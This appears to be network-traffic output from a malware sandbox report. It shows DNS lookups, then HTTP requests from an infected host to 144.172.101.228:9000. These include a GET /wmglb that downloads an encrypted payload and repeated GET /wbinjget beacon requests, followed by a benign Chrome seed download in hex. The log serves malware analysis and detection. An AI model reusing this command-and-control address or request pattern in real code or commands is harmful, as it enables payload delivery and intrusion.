May 21, 2025 21:48:03.686661005 CEST	52922	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.818219900 CEST	49503	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.818389893 CEST	61198	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.842957973 CEST	53	52922	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.843504906 CEST	53	61722	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.882239103 CEST	50567	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.882507086 CEST	53272	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.916477919 CEST	56020	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.916609049 CEST	57590	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:03.974081039 CEST	53	49503	1.1.1.1	192.168.2.5
May 21, 2025 21:48:03.974396944 CEST	53	61198	1.1.1.1	192.168.2.5
May 21, 2025 21:48:04.040678024 CEST	53	50567	1.1.1.1	192.168.2.5
May 21, 2025 21:48:04.040693998 CEST	53	53272	1.1.1.1	192.168.2.5
May 21, 2025 21:48:04.074512959 CEST	53	57590	1.1.1.1	192.168.2.5
May 21, 2025 21:48:04.075129032 CEST	53	56020	1.1.1.1	192.168.2.5
May 21, 2025 21:48:05.331311941 CEST	62718	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:05.331535101 CEST	62587	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:05.375318050 CEST	58873	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:05.375463009 CEST	57065	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:05.487046003 CEST	53	62718	1.1.1.1	192.168.2.5
May 21, 2025 21:48:05.487502098 CEST	53	62587	1.1.1.1	192.168.2.5
May 21, 2025 21:48:05.531488895 CEST	53	57065	1.1.1.1	192.168.2.5
May 21, 2025 21:48:05.533669949 CEST	53	58873	1.1.1.1	192.168.2.5
May 21, 2025 21:48:05.747725964 CEST	59720	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:05.747896910 CEST	60007	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:05.973670006 CEST	53	59720	1.1.1.1	192.168.2.5
May 21, 2025 21:48:05.973881006 CEST	53	60007	1.1.1.1	192.168.2.5
May 21, 2025 21:48:10.230566978 CEST	53	58431	1.1.1.1	192.168.2.5
May 21, 2025 21:48:16.713937998 CEST	50878	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:16.714018106 CEST	59018	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:16.869486094 CEST	53	59018	1.1.1.1	192.168.2.5
May 21, 2025 21:48:16.869980097 CEST	53	50878	1.1.1.1	192.168.2.5
May 21, 2025 21:48:17.457815886 CEST	50303	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:17.457954884 CEST	58938	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:17.614007950 CEST	53	50303	1.1.1.1	192.168.2.5
May 21, 2025 21:48:17.615045071 CEST	53	58938	1.1.1.1	192.168.2.5
May 21, 2025 21:48:19.676296949 CEST	49936	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:19.676435947 CEST	54840	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:19.904501915 CEST	53	49936	1.1.1.1	192.168.2.5
May 21, 2025 21:48:20.056550026 CEST	53	54840	1.1.1.1	192.168.2.5
May 21, 2025 21:48:20.458599091 CEST	52159	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:20.584989071 CEST	63074	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:20.585125923 CEST	53729	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:20.741235971 CEST	53	63074	1.1.1.1	192.168.2.5
May 21, 2025 21:48:20.741703033 CEST	53	53729	1.1.1.1	192.168.2.5
May 21, 2025 21:48:20.751440048 CEST	53	52159	1.1.1.1	192.168.2.5
May 21, 2025 21:48:21.456792116 CEST	56420	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:21.612417936 CEST	53	56420	1.1.1.1	192.168.2.5
May 21, 2025 21:48:22.295463085 CEST	54347	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:22.735038996 CEST	53	54347	1.1.1.1	192.168.2.5
May 21, 2025 21:48:23.731231928 CEST	51772	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:23.968008995 CEST	53	51772	1.1.1.1	192.168.2.5
May 21, 2025 21:48:29.225917101 CEST	53	49669	1.1.1.1	192.168.2.5
May 21, 2025 21:48:44.262712955 CEST	50773	53	192.168.2.5	1.1.1.1
May 21, 2025 21:48:44.422004938 CEST	53	50773	1.1.1.1	192.168.2.5
May 21, 2025 21:48:46.427129030 CEST	138	138	192.168.2.5	192.168.2.255
May 21, 2025 21:48:51.658044100 CEST	53	60088	1.1.1.1	192.168.2.5
May 21, 2025 21:48:51.870606899 CEST	53	62400	1.1.1.1	192.168.2.5
May 21, 2025 21:49:04.261358023 CEST	56557	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:04.261512041 CEST	59395	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:04.262521982 CEST	52320	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:04.262644053 CEST	57009	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:04.416680098 CEST	53	56557	1.1.1.1	192.168.2.5
May 21, 2025 21:49:04.416861057 CEST	53	59395	1.1.1.1	192.168.2.5
May 21, 2025 21:49:04.418030024 CEST	53	57009	1.1.1.1	192.168.2.5
May 21, 2025 21:49:04.419064999 CEST	53	52320	1.1.1.1	192.168.2.5
May 21, 2025 21:49:05.273721933 CEST	55713	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:05.274014950 CEST	63231	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:05.274162054 CEST	61829	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:05.274280071 CEST	50707	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:05.429182053 CEST	53	55713	1.1.1.1	192.168.2.5
May 21, 2025 21:49:05.429445982 CEST	53	63231	1.1.1.1	192.168.2.5
May 21, 2025 21:49:05.429457903 CEST	53	61829	1.1.1.1	192.168.2.5
May 21, 2025 21:49:05.429466963 CEST	53	50707	1.1.1.1	192.168.2.5
May 21, 2025 21:49:07.298933029 CEST	50228	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:07.454478979 CEST	53	50228	1.1.1.1	192.168.2.5
May 21, 2025 21:49:08.299139023 CEST	50228	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:08.454874039 CEST	53	50228	1.1.1.1	192.168.2.5
May 21, 2025 21:49:09.310266018 CEST	50228	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:09.465969086 CEST	53	50228	1.1.1.1	192.168.2.5
May 21, 2025 21:49:11.326191902 CEST	50228	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:11.481965065 CEST	53	50228	1.1.1.1	192.168.2.5
May 21, 2025 21:49:15.327557087 CEST	50228	53	192.168.2.5	1.1.1.1
May 21, 2025 21:49:15.483479023 CEST	53	50228	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
May 21, 2025 21:48:58.636153936 CEST	75	OUT	GET /wmglb HTTP/1.1 Host: 144.172.101.228:9000 Connection: Keep-Alive
May 21, 2025 21:48:59.084754944 CEST	1358	IN	HTTP/1.1 200 OK Cache-Control: no-cache Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: :9000 Date: Wed, 21 May 2025 19:48:58 GMT Connection: close Data Raw: 31 42 38 31 30 0d 0a e4 9b 12 f9 e4 8d 58 d1 bd 39 17 e0 18 1c 3d 09 fc 17 f7 ea 6d 0f c6 d2 0b 6b 6d d4 15 75 b4 11 7e 79 76 ce 7a 52 69 34 9e 9f 6c b9 51 a4 13 8e 6d 1e ce c0 9c 93 1b b6 f3 05 cf 51 53 9f 40 b7 13 bf 1d af 4b 99 a7 82 dc 9d fb 6c 9e d2 cb 80 53 4f f8 de 1c 51 b3 b2 55 64 d1 48 9e d6 82 fe 47 f6 bf 11 e5 14 09 55 31 22 cb a4 0d 05 71 0d f5 71 6b 92 cd 22 32 c4 0c 8a 47 a9 2b 0d 86 e0 27 ed 31 47 88 c8 4c da 34 3d e1 4f 16 65 34 d6 64 ad cc a2 55 23 4f 8e 3e f6 ad 7d 2b e5 95 ff d6 69 47 77 4b 47 40 0d 50 e3 2d a1 12 2d 68 f0 67 1a 62 23 0b b1 6a b5 2b 8e 34 eb 57 4b f8 62 04 29 19 8b d7 0c c7 cb af 74 35 17 43 b9 9c 9d 05 ed 74 d8 4d 46 c3 af 0a 63 d9 38 07 cd 60 cb 9c 78 35 d6 9f 14 15 bd d4 07 72 38 45 22 90 ec 33 8f 4b 74 7a 67 5f ba 75 d6 dd 94 62 fd 09 09 59 c5 ab 31 83 ef 98 d8 90 1a b8 1c a4 f6 0c ab be f7 d6 9c d7 1e 92 ec ee cd db a1 35 dd 9f 0c b7 ea 98 1f ef b1 9c 26 61 55 8f 8d 07 3f 67 b3 f4 de 23 a1 b9 70 d5 bc 9a 19 90 52 0b e5 70 f8 f6 a6 54 12 72 32 0e 1f 83 d2 d9 [TRUNCATED] Data Ascii: 1B810X9=mkmu~yvzRi4lQmQS@KlSOQUdHGU1"qqk"2G+'1GL4=Oe4dU#O>}+iGwKG@P--hgb#j+4WKb)t5CtMFc8`x5r8E"3Ktzg_ubY15&aU?g#pRpTr2`olZv&2uf/p^Xj5B(G~2LG;[#KH/wBKB,x.\hJ7kI_0}b-p>%mC`Zvu1_&7!b"p"+j(VM7XnR +<?VPvYfopAJ,~ap_6\|(<^KOAV"QD+DxOCn?9 [lh^Z\fz"Jo4/?mn!E71g5-]SJo-(VUAI@+oLZCI@4VQk;@JWy=OmX&o;yVn.g}CCbm*WO=&,Wppbo?4ghF`GZ;uALwn{%\J,[IJUIV;`F+

Timestamp	Bytes transferred	Direction	Data
May 21, 2025 21:49:12.226049900 CEST	89	OUT	GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1 Host: 144.172.101.228:9000
May 21, 2025 21:49:12.674443007 CEST	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Wed, 21 May 2025 19:49:12 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
May 21, 2025 21:49:12.970978022 CEST	89	OUT	GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1 Host: 144.172.101.228:9000
May 21, 2025 21:49:13.414021969 CEST	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Wed, 21 May 2025 19:49:12 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
May 21, 2025 21:49:13.711147070 CEST	113	OUT	GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1 Host: 144.172.101.228:9000 Connection: Keep-Alive
May 21, 2025 21:49:14.159887075 CEST	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Wed, 21 May 2025 19:49:13 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
May 21, 2025 21:49:14.463165045 CEST	113	OUT	GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1 Host: 144.172.101.228:9000 Connection: Keep-Alive
May 21, 2025 21:49:14.907483101 CEST	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Wed, 21 May 2025 19:49:13 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:47:52 UTC	454	OUT	GET /chrome-variations/seed?osname=win&channel=stable&milestone=134 HTTP/1.1 host: clientservices.googleapis.com if-none-match: SMChYyMDI1MDMwNi0xODMwMDQuNDI5MDAwEgkIABADGIYBIAA=#qBr8j3G36+k= a-im: x-bm,gzip sec-fetch-site: none sec-fetch-mode: no-cors sec-fetch-dest: empty user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept-encoding: identity priority: u=4, i
2025-05-21 19:47:52 UTC	771	IN	HTTP/1.1 200 OK content-security-policy: sandbox allow-downloads allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-by-user-activation allow-top-navigation-to-custom-protocols cross-origin-opener-policy: same-origin im: gzip x-content-type-options: nosniff x-country: us x-frame-options: SAMEORIGIN x-seed-signature: MEYCIQDUbqYkv8/H57iggmAAAeNIBEq6kRI7i2dJLdEYGcg20wIhAPfl6fkfQ9NkToTxLe5F5dEs+2AfDRnJMg5Ndfj47tFQ x-xss-protection: 0 date: Wed, 21 May 2025 19:47:52 GMT content-type: application/x-gzip alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 content-length: 55255
2025-05-21 19:47:52 UTC	1460	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 ff ec bd 79 9c 1b 59 75 2f de a5 f6 f4 cc dc d9 e4 b2 3d 6e cb 7b d9 1e 7b 3c 56 5b 2a 49 dd 6a 60 02 92 ba d5 ad 72 77 5b 2d f5 4e 12 b9 96 db 52 b9 4b 55 9a aa 52 ab e5 f7 fb 7d 32 81 24 8f 24 24 0c 21 1b 81 24 3c 5e 42 16 42 16 20 2f 64 d8 32 e3 81 40 02 0e 21 3c c8 83 10 08 21 ec 81 90 3d 90 e4 bd 4f d5 2d 49 55 a5 da d4 9e 99 0c e0 7f 66 dc ba e7 7c ef bd a7 ce 3d 77 3b f7 1c f0 c2 f2 7c ae b6 de 9e 9f 2a c4 e7 a7 96 db f3 e5 58 6b 61 29 d3 5a 58 62 9b 0b d7 e6 77 e6 a7 32 ad e9 ea 56 21 93 cd 4c cd 14 d6 b3 85 4c e6 e1 53 ec ca d5 f6 42 92 bc b8 d2 8a 3d 8c 7f 22 04 46 33 0b 33 73 d3 45 28 e7 24 51 85 3b 6a 56 90 98 1c cd d6 60 1a a3 62 20 3c 2d d2 8c 00 b9 0a 19 23 93 f1 58 6c 22 8c 31 11 77 1e 8d 43 fb 4d 96 04 0b 07 ee Data Ascii: yYu/=n{{<V[Ij`rw[-NRKUR}2$$$!$<^BB /d2@!<!=O-IUf\|=w;\|Xka)ZXbw2V!LLSB="F33sE($Q;jV`b <-#Xl"1wCM
2025-05-21 19:47:52 UTC	1460	IN	Data Raw: b6 bc 7e 1c 1b 79 c7 4f 7d ee b1 af ed c1 7f 3d 04 4e 76 50 8d 75 d1 9c c4 d2 42 8e 96 b9 ee 6c a4 2f 9b fa 26 92 53 01 38 a9 32 38 df 27 61 57 ea f0 10 73 2a 12 00 74 a9 7b da 61 92 a3 27 2a e1 8f 8a e6 15 74 6c 40 3a ae d7 f1 c7 86 01 d9 c1 41 d2 c8 b0 ac d4 14 d5 b2 2a c9 74 55 fb 20 05 11 0a 7c 95 67 04 98 d3 0a 64 1e 6a 26 6b a6 5f 7a c9 dd 40 51 4d f0 fc 3e 71 06 67 0f 0f 31 c9 c8 6e aa dd 06 2f e8 17 f8 60 f5 12 bb a8 57 ff 24 64 5a fb 24 a9 f1 24 fa 24 13 fa 76 31 9e 34 3e c9 57 42 e0 82 15 58 fb a8 59 28 c2 4d 5e 55 f2 92 9c a9 43 99 67 69 71 7a a7 21 43 45 fb 18 99 fe 8f 31 36 18 08 c5 83 94 cb 67 f0 66 0c 0f 31 63 91 c1 aa ba 0a c6 dd 44 ef 5f 17 31 50 5d 48 dc da a2 73 3c 49 92 63 49 4d dc e8 00 2a 65 ac ac f0 6f ee 01 47 dd 21 0b 8d 5a 1a a3 Data Ascii: ~yO}=NvPuBl/&S828'aWst{a'tl@:AtU \|gdj&k_z@QM>qg1n/`W$dZ$$$v14>WBXY(M^UCgiqz!CE16gf1cD_1P]Hs<IcIMeoG!Z
2025-05-21 19:47:52 UTC	1460	IN	Data Raw: a4 e3 0e 92 36 5f 95 19 90 cb b2 d0 2f 5f ef ab 32 57 4e c7 ab 32 57 6a eb 55 99 3b a8 e3 55 99 27 2a e1 8f 6a 5e 95 24 13 e8 a2 c0 f0 55 31 3c 9b f0 37 9a ce 17 f5 95 4c 51 86 1c af 4f 87 e8 c8 e9 05 7d eb 90 8a 1b 7d a5 5c a3 39 a9 a5 4f 24 95 58 b2 12 8f 85 07 45 d0 17 2e d0 8a 70 02 1c e9 5b f4 58 29 2c cb a2 de 24 e3 e8 6a e9 52 b3 e3 b1 8a 9d c8 7a ac d2 07 e1 78 ac e2 84 41 b8 62 94 8e f4 8e 93 48 63 cb b5 11 e2 c5 da 53 6f 7f e9 93 23 f8 53 a1 de ed 4c 91 ae c2 39 5a ac 36 e9 2a ec 2e 61 6e 6e e9 18 b3 0b ec 38 ee 5d 9d e3 cd 89 23 a5 f5 e6 c4 19 cc f1 e6 c4 15 8d f0 46 43 4e ab a6 bd 2c 9a dd de f1 ce 27 47 f0 3f 0e 81 33 3d 66 59 41 e7 7b 73 34 03 85 8c c8 15 05 9a 85 35 49 e0 a0 ac bf 36 e8 b3 12 67 03 72 53 2f ee 7a e5 98 a5 e3 c1 11 1e 62 ce Data Ascii: 6_/_2WN2WjU;U'j^$U1<7LQO}}\9O$XE.p[X),$jRzxAbHcSo#SL9Z6.ann8]#FCN,'G?3=fYA{s45I6grS/zb
2025-05-21 19:47:52 UTC	1460	IN	Data Raw: ac d2 55 e4 d7 1f 8a a7 c8 13 60 d4 f8 48 95 3a cd 8b 95 4d 8d af a2 68 8c f8 1e 55 6e 42 e6 c2 20 8d b1 4c 6f c1 d9 d0 f4 36 40 35 96 e9 6d b0 7a 88 01 ea b1 bc f0 1f 37 1f 96 8f 1b 93 1d fe 21 0c e0 59 5a 65 6b cb 0d 41 a2 b9 29 a8 6c a9 52 23 8d 51 67 fb 8d c7 7e 27 52 cb 32 b0 bf 18 2d 03 1d d8 2c cb 40 67 3e c2 81 cf fc b8 34 91 1c 1b 37 85 a4 32 1c 39 f1 7f 08 81 fd 59 48 b3 92 38 07 e9 2d ba 0a e7 a4 6a 15 79 14 d4 ba 9d aa 6c c7 2b a9 58 98 24 8f 83 7d 2c ad c2 aa 24 b7 2b 0d 5a a6 eb 15 91 ae 43 fc 8e ce 8f e4 11 70 5f 8f 00 ad e5 ee a4 59 99 6d 68 10 cc fd ce 75 51 0f f4 c2 0f 69 d5 30 f7 e3 ce 74 96 83 3b 27 b7 59 47 2e b3 db ac 13 01 72 9b 75 64 b5 b8 cd ba f1 12 8e bc 16 ff bd a4 d9 6d f6 0a 86 7f f1 2e 70 24 2b 49 8a 5a 82 22 d7 8d b3 92 97 Data Ascii: U`H:MhUnB Lo6@5mz7!YZekA)lR#Qg~'R2-,@g>4729YH8-jyl+X$},$+ZCp_YmhuQi0t;'YG.rudm.p$+IZ"
2025-05-21 19:47:52 UTC	1460	IN	Data Raw: d5 ef 09 fb 79 88 7e 1e f3 8b d5 01 da 8d 5e ac 0e 32 c3 59 5e ac 0e 58 13 31 50 4d e6 98 fc 2e d2 45 31 f9 dd 44 6f 89 c9 ef 81 40 b8 21 20 47 07 74 c9 3d 91 1e 4b a6 7a 31 ed f1 97 0e 83 a3 39 5a dc a6 95 59 9e 81 b2 a8 6f bb cb 22 dd 50 6a 92 ba a1 a8 5c 1a a3 52 7d 71 5d b4 4d fc 71 1f 46 8d cd 16 e0 45 67 c3 7d d8 2c c7 01 4e 2f 12 bd d9 cd 87 38 9e 94 e8 10 c7 1b cc 72 88 e3 8b 46 78 a3 e9 a7 0d 46 70 a7 78 d2 12 9f e2 1b 98 b6 de 52 d4 1c 94 55 14 cf 02 96 e0 b6 d4 0d 07 e2 1c 18 c5 95 c3 12 18 c5 95 0a 05 46 71 07 b1 04 46 f1 44 21 dc 51 d0 85 2a 7a 48 38 39 69 0e 17 96 ec 44 14 fa c9 90 66 32 15 b5 ac ca 90 ae f3 62 75 a5 31 99 c6 a8 73 76 d7 27 fd 89 02 de 4f ab 51 da 6c a1 4e 89 f7 53 5a ae 43 4f d9 75 cb 89 c3 6a f7 ac 85 1d bb 67 63 b1 d9 bd Data Ascii: y~^2Y^X1PM.E1Do@! Gt=Kz19ZYo"Pj\R}q]MqFEg},N/8rFxFpxRUFqFD!Q*zH89iDf2bu1sv'OQlNSZCOujgc
2025-05-21 19:47:52 UTC	1460	IN	Data Raw: 5e e7 d5 cc 36 cd 0b da 10 9a 87 75 49 6e 17 65 a8 28 4d 19 2e d5 64 a8 d4 24 81 d3 36 9b bf 80 81 d1 39 a9 05 e5 de af c6 f5 05 99 0e 6b 9b 0d c2 86 95 93 79 95 67 69 a1 4b 3f 9f c5 87 53 b1 18 79 be 8f 74 5e e2 a0 4c ab d0 4c ba 27 1e 8b c5 98 07 03 37 91 fa 45 0c 1c 9a 87 1c df ac df 54 0b 27 52 c1 5b 98 1a ac 85 af c3 c0 a1 59 be 5a 73 93 61 7f b5 4e 2d d4 05 13 b4 89 e4 80 42 7c a1 fd 6e 4a 6b 18 f3 20 1e 18 c0 64 9b ae 58 22 18 07 04 40 11 8c 83 d6 66 89 60 3c 40 0d 44 d0 1a 2c 6f af ba 29 0b fe f2 65 4f 8e e0 5f c0 c0 68 4e aa 37 24 05 2e 37 36 65 49 54 f5 94 bf da 67 50 5c 1f 41 bb 31 58 1e 41 bb 11 a1 47 d0 ae 10 96 47 d0 5e 18 84 2b 06 4a c9 14 47 29 99 92 c8 5a 5c c1 f0 bf 0a 81 c3 88 85 57 bb 4f 15 32 22 5f ef 1e 45 9d 37 9f 7f 1f f5 a4 d6 68 Data Ascii: ^6uIne(M.d$69kygiK?Syt^LL'7ET'R[YZsaN-B\|nJk dX"@f`<@D,o)eO_hN7$.76eITgP\A1XAGG^+JG)Z\WO2"_E7h
2025-05-21 19:47:52 UTC	1460	IN	Data Raw: a6 24 d7 c7 54 a8 a8 17 5a ad 56 7c ac ff e7 38 89 7c 2c e2 17 e0 8e 7e 67 de a5 36 c5 ed 21 f7 83 fb b4 e9 56 6a aa 95 06 94 59 28 aa 38 16 63 a2 7d bd 00 11 db 0f d9 b6 ee 9d 30 c7 2b aa 36 10 0a e0 de ce f7 ef f6 f0 35 5f bb 81 31 51 dc 0e 85 fb 40 e1 e0 de ce 5c 6d 40 15 a9 8b 60 d4 f4 e9 2d dc e1 21 66 6f c4 5e 07 15 eb be 6e d0 3f 78 1f 07 d1 c7 61 ce 74 e2 de 40 94 e9 c4 bd dc 9a e9 c4 1b 87 f0 c0 29 1d c6 7b 11 28 22 40 fb e7 e4 64 c7 63 e6 0a 16 48 d1 c6 bf ed 15 6d fc e9 53 b4 f1 ef 68 45 1b ef 29 da b8 55 d1 7e fe 28 d8 6b 84 90 5c 80 ad 25 9a 29 d2 55 6d f1 41 80 fb bb 8b cd 78 a5 58 ec bc 84 1b 0f 63 a3 df f8 ca 0d 4c 13 b0 99 86 b4 d1 7c d3 81 26 61 a3 f9 77 07 9a a4 8d e6 3f 1c 68 52 36 9a ff 74 a0 19 b7 d1 fc 5f 07 9a 09 1b cd a3 7f db 4f Data Ascii: $TZV\|8\|,~g6!VjY(8c}0+65_1Q@\m@`-!fo^n?xat@){("@dcHmShE)U~(k\%)UmAxXcL\|&aw?hR6t_O
2025-05-21 19:47:52 UTC	1460	IN	Data Raw: ac 2f 03 bd c9 ad 8e 80 7e d4 66 df 3c 4f 4a e4 9b e7 0d 66 f1 cd f3 45 23 bc d1 4a fb f1 db 63 c8 67 26 72 5b 3c 31 61 b8 1e ff 7e 08 9c 40 59 c5 ca 4d 79 93 66 61 5e 92 c9 a9 32 4b 0b 70 49 a6 45 65 53 92 eb 69 8c 5a 04 0f 76 13 f3 f8 91 87 39 86 c0 7d 41 2d 8f 4b 7d 21 f5 c7 a5 be 90 96 c7 a5 41 30 09 5f 4c 3d 77 6e 62 1c 85 da 35 12 37 75 9c 63 7f 3f 04 88 29 89 6d d6 a1 a8 16 14 49 d0 37 2a 45 49 e0 d9 f6 65 99 af f2 e2 92 cc d3 42 1a a3 f2 be 69 8d 4e e3 01 90 2c c7 7e fe e4 e8 d8 2f 00 ac e5 d8 2f 18 2e 11 00 b7 14 d1 44 47 8e 9d 8f 98 bd d1 e3 fa 46 0a ff 44 08 1c cd 6c 4b 3c 37 d5 6c 08 7a 94 e3 29 28 d0 ed 2c ac 1a f9 84 d3 18 75 0c 44 fa 52 fe 23 eb 9b 88 c7 c2 b6 72 5b 98 2f ad dc e2 f1 e9 14 fb da b3 01 d6 c4 fe 5e 94 46 62 7f 4f 30 6b 62 7f Data Ascii: /~f<OJfE#Jcg&r[<1a~@YMyfa^2KpIEeSiZv9}A-K}!A0_L=wnb57uc?)mI7*EIeBiN,~//.DGFDlK<7lz)(,uDR#r[/^FbO0kb
2025-05-21 19:47:52 UTC	1460	IN	Data Raw: b8 6e da 53 17 be 1c ad f5 75 7a a7 b1 42 0b 3c 97 93 44 4e cf 71 3a 80 e9 f0 45 18 c4 a2 04 02 0b 68 68 02 61 05 b5 3f 81 c0 6e 16 23 b0 b5 f2 45 0a 66 c4 7c 61 06 b4 6d be 78 bb 31 79 03 37 32 88 25 1c 18 34 b8 81 dc 2d b4 bf dd 1c 18 39 80 39 1d 18 73 00 2b 3b 30 76 50 e3 eb 0b ec 6f 5c 07 19 cf 4f 13 da cd aa e4 2e 0d 3b 94 f9 3a 14 d5 f8 6e 4c 7a 3f ef ae 8c b9 33 cc a0 66 dc 19 65 60 03 ee 0c b3 7b ee c1 8d 76 3f c6 80 e6 ba 1f 60 b7 86 ba 1f e9 a6 4c b4 7f c3 06 32 ce fe 70 bb 30 cb 81 41 07 30 c8 fe 98 83 98 62 7f b4 dd 18 61 7f d4 81 cd 6f 3f e4 00 a6 d2 73 1c de 34 ce ee 55 cc c5 cc ae 42 a6 b4 94 1b 5b e1 39 28 8d e5 24 59 6e ea 6f b6 e6 f8 2d 28 f0 35 49 e2 f4 04 e8 82 00 ad 94 65 56 86 50 54 6a b4 0c bd 98 98 83 e0 80 fd a0 69 4e aa f2 6c 29 Data Ascii: nSuzB<DNq:Ehha?n#Ef\|amx1y72%4-99s+;0vPo\O.;:nLz?3fe`{v?`L2p0A0bao?s4UB[9($Yno-(5IeVPTjiNl)
2025-05-21 19:47:52 UTC	1460	IN	Data Raw: f7 3b a2 20 02 79 9a b7 4d 49 f3 74 54 7a 00 bf 37 4e c6 c6 62 63 e3 b1 c9 c9 b1 78 da 38 e7 fe 89 f7 3c 35 f2 18 36 f4 38 36 f2 d3 7f f0 77 5f 7b 7c b4 9b 46 30 84 ff d8 bd e0 42 80 56 cf 69 2a 7a 59 14 da 69 8c fa d9 10 d8 d7 fd db 34 eb be 26 f4 ec ef db 0f 74 46 d9 dd fa ff f4 bb ac 4a fc e9 db 46 c7 99 87 06 50 73 ea 38 88 38 48 a6 92 6d 6e 6e 42 39 fc 1e 9b ec c8 e7 a0 ec c8 e7 84 ec 48 5f d9 25 9e 83 b2 4b 3c 27 64 97 f0 95 5d f2 39 28 bb e4 73 42 76 49 5f d9 a5 9e 83 b2 4b 3d 27 64 97 72 92 5d c5 61 02 7e 4d c8 7b 06 7e c8 98 80 83 b4 83 3a 02 0e da 2b e8 55 3f f0 7c 88 e1 af 09 81 70 9e 56 d4 22 ad d6 16 a4 12 ad a8 7a e4 8e 73 f6 1c 97 b1 89 30 60 f0 7e 5a 8d d2 1a b9 03 51 e2 fd 94 96 ab fa 53 f6 ab 7a 27 8e 78 37 85 9c 58 b1 17 6a 2c 91 7e 16 Data Ascii: ; yMItTz7Nbcx8<5686w_{\|F0BVi*zYi4&tFJFPs88HmnnB9H_%K<'d]9(sBvI_K='dr]a~M{~:+U?\|pV"zs0`~ZQSz'x7Xj,~

Timestamp	Bytes transferred	Direction	Data
